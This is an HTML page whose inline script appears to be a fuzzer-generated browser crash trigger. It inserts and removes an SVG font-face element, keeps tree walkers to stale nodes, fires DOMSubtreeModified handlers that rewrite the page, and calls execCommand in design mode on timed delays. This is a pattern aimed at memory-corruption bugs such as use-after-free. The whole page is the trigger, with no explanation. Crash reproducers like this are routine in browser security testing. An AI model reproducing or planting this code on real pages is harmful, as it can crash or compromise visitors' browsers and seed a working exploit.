<body id=body1>>>><dd id=dd1><blockquote id=blockquote1>>
<script>
var docElement = document.body;
docElement.contentEditable = "true";
function initCF() {
try { fontface1 = document.createElementNS("http://www.w3.org/2000/svg", "font-face"); } catch(e) {}
try { docElement.appendChild(fontface1); } catch(e) {}
setTimeout("CFcrash()", 0);
}
document.addEventListener("DOMContentLoaded", initCF, false);
function CFcrash2() {
try { verifyIterators(); storeIterators(25, 25, 20); } catch(e) {}
document.designMode = "on";
try { document.execCommand("inserthtml", false, "") } catch(e) {}
try { document.execCommand("InsertHTML", false, "This should be in a list item.") } catch(e) {}
}
var CFnodeIterators = [], CFtreeWalkers = [];
function storeWalkers(start, step, count) { CFtreeWalkers = []; for (c = 0; c != count-1; c++) { itr = document.createTreeWalker(docElement, 0xFFFFFFFF); node = itr.nextNode(); i = 0; while (node) { if (i == start + (step * c)) { CFtreeWalkers.push(itr); break; } i++; node = itr.nextNode(); }}}
function verifyWalkers() { if (!CFtreeWalkers.length) return; for (c = 0; c != CFtreeWalkers.length-1; c++) { itr = CFtreeWalkers[c]; itr.parentNode(); itr.lastChild(); itr.parentNode(); itr.previousNode(); itr.nextNode(); itr.nextNode(); }}
function CFcrash() {
try { if (fontface1 != docElement) { fontface1.parentNode.removeChild(fontface1); delete fontface1; if (typeof body1 != "undefined") fontface1 = body1; }} catch(e) {}
try { dd1_c = 0; dd1.addEventListener("DOMSubtreeModified", function () { dd1_c += 1; if (dd1_c > 40) return; docElement.innerHTML = 1;}, false); } catch(e) {}
setTimeout('try { docElement.replaceChild(blockquote1, docElement.firstChild.nextSibling); } catch(e) { try { docElement.appendChild(blockquote1); } catch(e) {} }', 390);
try { fontface1.style.display = "table-column" } catch(e) {}
try { verifyWalkers(); storeWalkers(6, 1, 20); } catch(e) {}
if (docElement) docElement.offsetTop;
setTimeout('try { fontface1_c = 0; fontface1.addEventListener("DOMSubtreeModified", function () { fontface1_c += 1; if (eval("fontface1_c "+String.fromCharCode(62)+" 40")) return; try { document.open(); document.write("c"); document.close(); } catch(e) {}}, false); } catch(e) {}', 375);
setTimeout("CFcrash2()", 1708);
}</script></html>>